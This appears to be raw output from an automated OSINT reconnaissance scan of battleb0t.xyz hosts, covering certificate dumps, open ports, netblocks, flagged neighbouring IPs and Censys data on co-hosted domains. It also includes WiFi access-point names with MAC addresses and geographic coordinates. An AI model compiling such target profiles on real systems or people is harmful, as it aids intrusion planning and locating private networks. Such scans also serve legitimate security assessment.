| 2023-05-12 02:45:44 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | Chantilly, Virginia, 20151, United States, North America | 2606:50c0:8002::153 |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://fluid.battleb0t.xyz/logo.png | https://fluid.battleb0t.xyz/ |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:76:57:05) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:c7:00:14:21:71:88:e2:18:10:f8:e3:ee:d1:89:37:10:7b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:47 2022 GMT
Not After : Mar 27 01:46:46 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ca:91:c0:24:2c:ac:ca:ae:72:a2:1c:76:2b:73:
ee:03:78:0b:80:eb:3e:1e:2f:33:3d:ee:c9:08:d3:
24:62:ca:69:54:4a:4f:62:ee:85:3e:9e:5e:5f:d1:
1f:ab:8a:39:77:32:f2:c3:16:74:4d:2e:2a:61:7c:
7c:02:16:fd:f8:90:cd:06:b2:e9:f4:43:77:1b:75:
bb:be:c8:56:44:f6:50:11:ac:06:ec:e8:59:ef:64:
25:2f:4d:3f:96:fc:de:28:67:0a:4e:3f:7e:0e:35:
82:50:a2:e2:53:60:28:9a:07:c8:48:6d:b6:14:30:
5d:26:53:a7:34:c5:04:39:e7:67:e1:8b:e5:5d:a5:
3a:24:32:e3:b6:35:44:1a:60:82:6c:43:b7:4d:91:
70:e8:77:c6:32:fc:99:9f:ad:b8:12:75:4d:70:f3:
52:73:ab:3d:62:1e:0f:a1:00:40:14:f2:ee:4f:92:
e4:8c:8a:19:22:54:b9:c3:71:e1:6b:29:43:5b:56:
a9:e7:cc:16:78:2e:25:bc:fa:16:51:9d:87:b3:64:
aa:85:a8:c4:c7:1b:38:de:e1:9c:ae:93:7d:3f:98:
02:a9:aa:fa:8c:80:52:99:2e:98:ff:77:3d:76:8b:
8f:32:cd:03:00:51:9a:81:df:0d:68:7a:8d:16:fa:
b6:b1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6C:34:7D:03:48:53:73:CF:0D:0C:39:44:A5:D1:A0:E8:F3:90:7F:11
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 27 02:46:47.420 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:5E:6B:E1:80:95:E9:06:B9:64:A1:6D:DC:
F7:46:19:D7:44:B3:41:56:D0:CD:B2:17:79:5E:38:01:
98:82:42:B4:02:21:00:BB:82:4F:AE:81:BB:9F:FF:F6:
F5:EC:BC:04:24:9F:54:06:50:1B:72:28:CB:B2:D2:B9:
F3:82:3C:FB:08:50:07
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:46:47.434 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:DB:34:C7:60:1E:A0:7B:B4:93:B7:C3:
6F:79:DF:2B:2D:A1:07:F6:E0:3C:66:9E:DB:AB:71:DF:
C8:12:FA:43:40:02:20:40:0C:EE:4D:C0:C7:6C:61:B4:
C4:4E:15:E2:3B:37:04:6C:A3:AE:DB:A8:2D:9F:6D:D1:
44:F8:EF:BB:53:2D:AA
Signature Algorithm: sha256WithRSAEncryption
2d:0d:59:11:7e:bd:11:7c:f4:13:c8:d6:c5:40:47:7f:c1:17:
f8:18:85:ad:f5:ee:eb:ca:33:40:d0:80:8a:a2:5e:d9:cb:36:
84:5e:8f:ea:da:80:c0:0f:bc:fb:ed:5d:aa:90:c6:8d:e2:e0:
93:88:ba:dd:b6:40:89:0d:e9:1c:2b:f7:10:55:11:ed:5f:b4:
fb:fb:56:28:a1:cf:a8:59:b5:c5:78:e9:54:8e:06:d9:23:af:
f2:43:7d:64:52:f1:26:ea:4f:5e:ca:47:af:10:86:bc:07:b5:
f9:72:9d:08:e5:af:f4:89:55:6c:58:05:70:62:87:bc:37:3c:
b1:7c:29:a6:06:1e:b5:a4:e0:40:13:6d:69:d7:73:91:80:75:
18:3c:5b:0a:7c:a4:ff:05:c7:98:e1:97:78:96:31:ea:08:08:
4a:40:e6:a1:dd:b4:58:50:6f:80:e3:70:72:18:89:1b:9e:32:
1a:ca:dd:a2:a8:e9:74:eb:2c:c4:a6:1c:b7:31:48:b6:e4:67:
9b:a7:9c:a6:df:cd:82:95:8c:31:83:cd:c7:0e:e3:d2:a3:19:
06:a0:13:7b:a7:11:2c:dd:85:53:7f:ff:2c:0f:11:cf:5d:a7:
fb:7d:2f:9b:4b:7a:3e:55:04:0b:72:4a:13:4f:26:99:3b:63:
24:f8:e3:2a
|
| 2023-05-12 03:32:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.5:8443 | 188.114.97.0/24 |
| 2023-05-12 03:08:59 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.92 | 87.248.157.102 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Samsung Galaxy S8_5419 (Net ID: A2:C9:A0:CE:8F:DC) | 37.751, -97.822 |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://fluid.battleb0t.xyz/app_badge.png | https://fluid.battleb0t.xyz/ |
| 2023-05-12 02:46:29 | Netblock Membership | No | RIPE | 5 | 0 | 3 | 0 | None | 64.226.80.0/20 | 64.226.81.43 |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.35): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:59:16 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | {u'count': 1, u'search_terms': [{u'id': u'host', u'value': u'188.114.96.1'}], u'result': [{u'environment_id': 100, u'job_id': u'631a665717ba8f2f707e8915', u'analysis_start_time': u'2022-09-08 22:02:00', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'5d930bb75d728b31880a4b3fe975a343b4dfd7855f2a943ba94d6c5bb93a8cfa', u'type': None, u'type_short': u'url', u'size': 44}]} | 188.114.96.1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 3035 3464 (Net ID: 00:0F:CC:61:D8:F8) | 32.8608, -79.9746 |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 104.196.30.220 |
| 2023-05-12 02:46:50 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.74.170.74 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Eijsbouts (Net ID: 00:01:E3:04:C3:19) | 52.3759, 4.8975 |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:04:02:53:52:8b:ff:fb:8a:0a:11:44:e7:ab:f5:69:c5:9e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:33:43 2023 GMT
Not After : Apr 14 17:33:42 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:56:66:b3:c8:a2:23:b1:5a:3f:a8:f8:12:86:96:
e9:2c:15:d7:f2:10:34:11:7a:db:91:0d:f0:b3:57:
f5:24:8b:d6:33:b2:e0:da:47:1e:c3:4b:59:19:6f:
0a:27:ae:26:29:f9:b7:07:60:5c:49:2f:47:35:2a:
5c:c8:f0:96:d7
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3C:85:65:2A:BA:2A:04:2A:54:22:30:3E:E5:23:B1:1E:15:C3:96:05
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 14 18:33:43.335 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:F2:1C:95:AC:AF:08:7C:44:9A:42:32:
2C:2F:8A:04:A1:13:F3:46:FA:9D:26:CA:C9:98:C2:1D:
74:69:E4:86:1B:02:21:00:B6:39:78:67:7F:13:7F:74:
50:2A:AE:F8:F3:CD:06:25:FB:E7:4F:A7:FE:B7:C5:D8:
77:35:DE:26:00:5A:58:41
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 14 18:33:43.326 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:98:54:50:30:B1:AC:EB:16:2E:CF:2C:
E2:5C:6F:49:73:2D:91:13:E2:7A:C0:23:16:9D:9E:E9:
34:9D:A8:4E:A2:02:21:00:E3:DA:6F:CF:C9:A3:6F:47:
24:1E:42:4E:CB:2C:6D:AC:F1:F2:5C:4B:15:0B:90:2E:
FE:19:52:BD:26:73:E2:1D
Signature Algorithm: sha256WithRSAEncryption
2f:9e:31:fd:c7:7d:47:cd:fd:01:35:76:75:af:bd:65:15:84:
23:f2:b5:a5:8c:aa:3b:d4:46:ab:0f:e0:6d:fb:3d:ad:16:bd:
71:fe:51:be:c7:6a:78:ea:91:90:3b:63:30:ca:95:ff:ee:9d:
47:eb:f2:5f:85:42:d9:44:d3:72:73:10:be:c7:a2:44:25:dc:
30:6d:25:07:16:5b:55:37:2d:53:15:d4:54:6f:02:56:82:ca:
95:f2:b0:da:05:fe:09:30:21:c9:bf:23:af:eb:66:9c:3c:46:
c8:ed:d9:23:0c:31:c4:20:44:6b:a8:53:fc:12:a1:6a:08:26:
66:47:c9:ad:7e:d3:29:01:28:72:f6:e7:00:31:5c:a0:b4:5c:
64:09:26:8a:da:16:e9:1a:8b:b1:d1:3c:b2:df:e5:77:f4:c3:
a8:4f:d0:1f:26:99:a7:10:8e:7f:65:a5:5e:cc:0b:70:42:ad:
cf:7c:e0:c3:b5:7f:91:07:d9:1f:ba:ef:57:c4:d1:91:9e:a3:
40:93:8d:12:a1:08:bc:b5:cb:35:70:ad:45:f9:4b:fb:c8:74:
0b:37:9e:08:b9:59:0e:0e:55:98:c2:7b:c5:55:28:93:52:3c:
ca:41:c2:5e:52:c3:32:1b:c4:d5:a9:18:45:1e:58:3a:fc:ed:
c0:69:88:aa
|
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.139): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.244): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:f3:5c:50:fa:14:e0:3f:8b:c6:63:22:13:37:d5:
cb:b8:bd:8b:1e:a5:6b:3e:a7:72:86:59:28:5c:40:
8b:1c:f8:2f:50:4b:f5:ef:0d:c5:e9:de:f9:20:da:
78:1c:0d:66:f9:dc:3f:93:0b:74:ad:7f:b2:a1:7a:
56:57:3c:77:28:5a:1a:58:66:08:52:f6:b9:f7:00:
cb:6d:f6:d8:ce:be:b0:7d:24:54:62:4e:58:7b:85:
b9:a9:b7:ac:6a:8d:99:a5:06:fd:0d:b0:88:77:c4:
1e:ca:a9:28:8a:9d:40:a2:d0:47:0a:5a:ad:c2:3d:
86:b0:bc:4e:c3:7b:51:cd:65:3e:10:7e:3b:3a:f9:
c4:70:b5:67:78:ac:bb:4f:31:b9:51:1b:63:89:e0:
2e:5b:c6:8b:52:39:42:6a:aa:6d:6c:72:68:d0:4f:
7c:c9:6a:0a:9c:f8:75:aa:50:d4:8d:ce:7f:ca:28:
87:8a:b7:bc:e2:04:a3:9b:bd:0d:fe:95:0c:de:fb:
3a:e4:bd:4d:5a:d2:f2:ba:0e:54:6d:82:9a:5c:f9:
ee:f6:a3:1e:93:71:37:5f:83:bf:08:49:75:e7:cf:
fc:13:fc:3c:21:17:a8:95:ac:1a:b0:0b:09:b4:ce:
a6:d7:8e:cb:8b:5e:2f:81:f3:69:1e:af:dd:1c:d1:
d3:27
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
56:a7:32:cc:63:2f:7b:45:7f:05:18:5f:3e:03:67:82:e5:0e:
14:24:2d:4e:bd:24:f5:fa:90:92:69:17:7b:d1:23:b4:5f:72:
7a:af:32:e2:c8:28:7e:98:41:f2:c7:ab:41:34:02:6f:ca:a4:
77:0e:6b:df:35:1b:69:e8:30:42:43:a2:b1:d9:fd:cb:17:1e:
46:a3:67:c9:5d:ff:94:85:0e:a2:df:d3:83:d0:a3:f2:83:7b:
dd:2e:d5:ae:32:94:05:46:0c:19:ca:ed:27:24:30:de:c1:83:
b3:fa:a9:28:10:06:41:f9:bc:8e:ec:2c:b2:c5:50:1b:53:d4:
5f:dc:93:4c:91:47:36:3e:18:bb:60:2e:2b:c3:a2:8e:d0:41:
bf:b5:f2:c1:3c:9e:23:83:f3:0a:e9:90:b8:ea:07:4c:7d:33:
7f:96:41:8c:3e:17:1d:9e:ed:d7:88:e1:f2:d6:4c:ee:67:b7:
9d:77:dd:54:17:a0:45:80:3c:14:ae:d9:2c:f9:2f:a7:d3:1a:
b6:ff:c0:51:b2:15:42:38:03:d0:4b:ff:c0:3f:6d:02:65:07:
67:bb:0a:98:60:da:ab:a9:72:b1:8d:b2:e0:ad:99:f8:08:b9:
1a:39:e6:69:82:23:94:db:8e:23:77:72:cb:aa:45:70:fd:4e:
10:ce:72:06
|
| 2023-05-12 03:01:00 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.103): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Collaborative projects | battleb0t.github.io |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | RTL867x-ADSL (Net ID: 00:08:A1:C5:5A:46) | 40.2024, 29.0398 |
| 2023-05-12 02:54:54 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3121::1:443 | 2a06:98c1:3121::1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Matrix (Net ID: 00:06:25:B5:6B:A4) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.238): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:02 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.2:443 | 188.114.97.0/24 |
| 2023-05-12 02:53:39 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T01:06:26.588Z", "ip": "185.199.108.153", "location_updated_at": "2023-05-11T02:22:47.949696Z", "autonomous_system_updated_at": "2023-04-28T16:49:31.623526Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"turtledev.in": {"record_type": "A", "resolved_at": "2023-03-17T16:23:43.722396430Z"}, "docs.c-labs.com": {"record_type": "CNAME", "resolved_at": "2023-03-17T13:39:25.912117315Z"}, "sidzhang.me": {"record_type": "A", "resolved_at": "2023-05-07T18:33:14.124363141Z"}, "www.gmacd.net": {"record_type": "CNAME", "resolved_at": "2023-04-11T20:22:42.495209956Z"}, "www.umeerrama.com": {"record_type": "CNAME", "resolved_at": "2023-03-16T03:24:25.913053555Z"}, "markthorp.com": {"record_type": "A", "resolved_at": "2023-03-16T13:51:32.870019802Z"}, "lainamae.github.io": {"record_type": "A", "resolved_at": "2023-03-19T16:04:34.954365399Z"}, "rowanmanning.com": {"record_type": "A", "resolved_at": "2023-03-16T14:14:04.579032272Z"}, "www.wise.fitness": {"record_type": "CNAME", "resolved_at": "2023-04-26T17:59:27.361118834Z"}, "yomikang.com": {"record_type": "A", "resolved_at": "2023-03-13T23:26:36.363123885Z"}, "njuics.cn": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:17:45.580207010Z"}, "villterv.duckdns.org": {"record_type": "A", "resolved_at": "2023-03-22T20:33:12.338237784Z"}, "fanschou.github.io": {"record_type": "A", "resolved_at": "2023-03-20T01:52:09.688479139Z"}, "www.mpcontractingllc.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T14:45:02.303045548Z"}, "meth.supplies": {"record_type": "A", "resolved_at": "2023-03-04T19:36:17.924857492Z"}, "sprouttech.co.uk": {"record_type": "A", "resolved_at": "2022-11-16T13:56:26.442294692Z"}, "www.jordancox.me": {"record_type": "CNAME", "resolved_at": "2023-02-25T17:36:05.584035257Z"}, "www.raymondyin.com": {"record_type": "CNAME", "resolved_at": "2023-03-20T15:36:01.064188731Z"}, "devxchange.io": {"record_type": "A", "resolved_at": "2023-03-07T16:15:10.934357942Z"}, "www.2briley.com": {"record_type": "CNAME", "resolved_at": "2023-04-28T13:20:47.065260373Z"}, "get.intersolar-nft.com": {"record_type": "CNAME", "resolved_at": "2022-09-29T13:43:22.976827994Z"}, "elvishenry.github.io": {"record_type": "A", "resolved_at": "2023-03-10T15:31:55.603307966Z"}, "www.maloley.me": {"record_type": "CNAME", "resolved_at": "2023-03-08T17:00:37.978750103Z"}, "surdu.me": {"record_type": "A", "resolved_at": "2023-05-04T18:59:57.242525118Z"}, "sarith.net": {"record_type": "A", "resolved_at": "2023-03-22T20:26:16.119209942Z"}, "altiusaero.com": {"record_type": "A", "resolved_at": "2023-04-27T13:40:10.787464508Z"}, "www.felixnrc.ar": {"record_type": "CNAME", "resolved_at": "2023-03-03T12:11:30.075523539Z"}, "www.funmitoblessed.com": {"record_type": "CNAME", "resolved_at": "2023-04-24T14:40:07.732044366Z"}, "api.kekesi.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T15:57:13.673998398Z"}, "guestsofthetalkshow.net": {"record_type": "A", "resolved_at": "2023-04-24T20:00:08.001925119Z"}, "www.axelfontaine.com": {"record_type": "CNAME", "resolved_at": "2023-04-25T14:00:05.244431324Z"}, "www.bluebridges.ml": {"record_type": "CNAME", "resolved_at": "2023-01-04T15:20:49.107407095Z"}, "www.rowanmanning.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:54:15.722717563Z"}, "www.vishvak.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T05:45:50.510079142Z"}, "marcosanson.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:31.111859990Z"}, "www.henryelvis.fr": {"record_type": "CNAME", "resolved_at": "2023-03-04T16:13:03.494253182Z"}, "www.phorgr.com": {"record_type": "CNAME", "resolved_at": "2022-11-21T13:38:18.017307639Z"}, "comics.bilardi.net": {"record_type": "CNAME", "resolved_at": "2023-05-08T19:49:11.854401544Z"}, "www.littlejohnengineering.co.uk": {"record_type": "CNAME", "resolved_at": "2023-03-17T19:35:20.132850023Z"}, "www.dokomado.com": {"record_type": "CNAME", "resolved_at": "2023-04-21T22:50:25.934348288Z"}, "www.mishamol.ru": {"record_type": "CNAME", "resolved_at": "2023-04-24T22:01:44.486211723Z"}, "alzhao.com": {"record_type": "CNAME", "resolved_at": "2023-03-11T12:58:23.599756683Z"}, "sarahsantiago.com.br": {"record_type": "A", "resolved_at": "2023-02-18T01:39:20.470353293Z"}, "jarrodboone.info": {"record_type": "A", "resolved_at": "2023-03-06T16:41:45.613039480Z"}, "p2sr.github.io": {"record_type": "A", "resolved_at": "2023-03-22T00:24:30.825824556Z"}, "gmacd.net": {"record_type": "A", "resolved_at": "2023-04-27T21:00:21.802895223Z"}, "www.ericdallo.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:26.937961924Z"}, "gmacd.github.io": {"record_type": "A", "resolved_at": "2023-03-21T01:31:25.465960326Z"}, "asm.lucasteske.dev": {"record_type": "CNAME", "resolved_at": "2022-11-14T14:35:22.539258750Z"}, "www.jinhankim.com": {"record_type": "CNAME", "resolved_at": "2023-03-09T22:14:08.392069866Z"}, "www.harrisosserman.com": {"record_type": "CNAME", "resolved_at": "2023-02-28T14:03:52.247193728Z"}, "kleinsplayground.com": {"record_type": "A", "resolved_at": "2023-03-22T18:44:01.108063584Z"}, "funmitoblessed.github.io": {"record_type": "A", "resolved_at": "2023-03-22T11:31:23.278745293Z"}, "qfield.org": {"record_type": "A", "resolved_at": "2023-03-12T17:49:56.752630209Z"}, "www.cryptdocs.ml": {"record_type": "CNAME", "resolved_at": "2023-03-19T17:59:09.887768968Z"}, "vighnesh.ninja": {"record_type": "A", "resolved_at": "2023-03-19T17:46:52.312167687Z"}, "agnias47.github.io": {"record_type": "A", "resolved_at": "2023-03-14T15:57:58.140445992Z"}, "gronskiy.com": {"record_type": "A", "resolved_at": "2023-03-17T14:05:29.509591628Z"}, "dokomado.com": {"record_type": "A", "resolved_at": "2023-03-12T13:46:45.810442245Z"}, "wise.fitness": {"record_type": "A", "resolved_at": "2023-03-07T15:51:26.458635165Z"}, "www.eknert.com": {"record_type": "CNAME", "resolved_at": "2023-03-09T21:55:19.776247657Z"}, "vesgauniformes.com": {"record_type": "A", "resolved_at": "2023-02-22T15:35:48.205405836Z"}, "millinow.com": {"record_type": "A", "resolved_at": "2022-09-26T14:09:37.255614081Z"}, "jianli.hogancn.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:40:00.667151420Z"}, "prohlaseni.altair.blog": {"record_type": "CNAME", "resolved_at": "2023-05-07T12:27:20.143793708Z"}, "wolfgangbai.top": {"record_type": "CNAME", "resolved_at": "2023-03-08T00:37:57.090239320Z"}, "loadout.inkstrike.net": {"record_type": "CNAME", "resolved_at": "2023-04-18T19:24:34.277583383Z"}, "maxkross.github.io": {"record_type": "A", "resolved_at": "2023-03-10T00:16:04.714610636Z"}, "derekmagill.net": {"record_type": "A", "resolved_at": "2023-05-03T19:23:31.613919607Z"}, "arthurkarrer.me": {"record_type": "A", "resolved_at": "2023-03-11T16:57:07.559804549Z"}, "www.adamtroc.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T16:03:03.862526493Z"}, "assets.javierarce.com": {"record_type": "CNAME", "resolved_at": "2023-03-30T15:20:51.562601099Z"}, "varshaprasad.com": {"record_type": "A", "resolved_at": "2023-03-22T11:02:20.888175128Z"}, "mlefree.com": {"record_type": "A", "resolved_at": "2023-03-08T14:17:25.701832947Z"}, "cyberfriendscircle.io": {"record_type": "A", "resolved_at": "2023-04-23T17:40:41.917214504Z"}, "dhanush.is-a.dev": {"record_type": "CNAME", "resolved_at": "2023-03-09T23:39:54.025920340Z"}, "static.test.habuhome.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:22:37.725893073Z"}, "sar.portal2.sr": {"record_type": "CNAME", "resolved_at": "2023-03-19T17:40:17.370882551Z"}, "p1nant0m.com": {"record_type": "A", "resolved_at": "2023-03-26T21:40:25.850660596Z"}, "www.lainamae.com": {"record_type": "CNAME", "resolved_at": "2023-03-01T14:30:14.030874675Z"}, "tablerpressurewashing.com": {"record_type": "A", "resolved_at": "2023-03-11T12:53:29.882274705Z"}, "www.kadupitiya.lk": {"record_type": "CNAME", "resolved_at": "2023-02-24T16:44:15.687183626Z"}, "robimsinazor.sk": {"record_type": "A", "resolved_at": "2023-02-22T21:18:54.646853756Z"}, "alexndrvega.github.io": {"record_type": "A", "resolved_at": "2023-03-07T16:15:51.452605486Z"}, "wanderandcompass.com": {"record_type": "A", "resolved_at": "2023-03-18T22:39:25.125598440Z"}, "www.runningcode.net": {"record_type": "CNAME", "resolved_at": "2023-05-03T20:11:29.826302413Z"}, "vishvak.com": {"record_type": "A", "resolved_at": "2023-05-11T22:16:52.855230065Z"}, "codelib.alteredlife.co.uk": {"record_type": "CNAME", "resolved_at": "2023-04-17T23:28:22.855144188Z"}, "www.ryjer.net": {"record_type": "CNAME", "resolved_at": "2023-04-04T21:20:41.787316653Z"}, "t.iiwhy.cn": {"record_type": "CNAME", "resolved_at": "2023-03-09T12:46:57.908049390Z"}, "www.fanfit.com.au": {"record_type": "CNAME", "resolved_at": "2023-05-01T12:19:08.882320873Z"}, "rpg.skmobi.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:42:56.247014800Z"}, "lethaltext.ai": {"record_type": "A", "resolved_at": "2023-04-03T12:14:51.572505030Z"}, "felixnrc.github.io": {"record_type": "A", "resolved_at": "2023-03-21T01:32:03.703893737Z"}, "www.staceywu.co.uk": {"record_type": "CNAME", "resolved_at": "2023-03-05T19:59:23.259144477Z"}, "www.brly.net": {"record_type": "CNAME", "resolved_at": "2023-04-08T19:19:47.603414761Z"}, "www.wishingwellberlin.com": {"record_type": "CNAME", "resolved_at": "2023-04-28T17:00:16.833241253Z"}, "intersolarnft.github.io": {"record_type": "A", "resolved_at": "2023-03-10T00:16:10.689229599Z"}, "www.agitator.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T13:20:02.173553830Z"}, "bamru-tech.github.io": 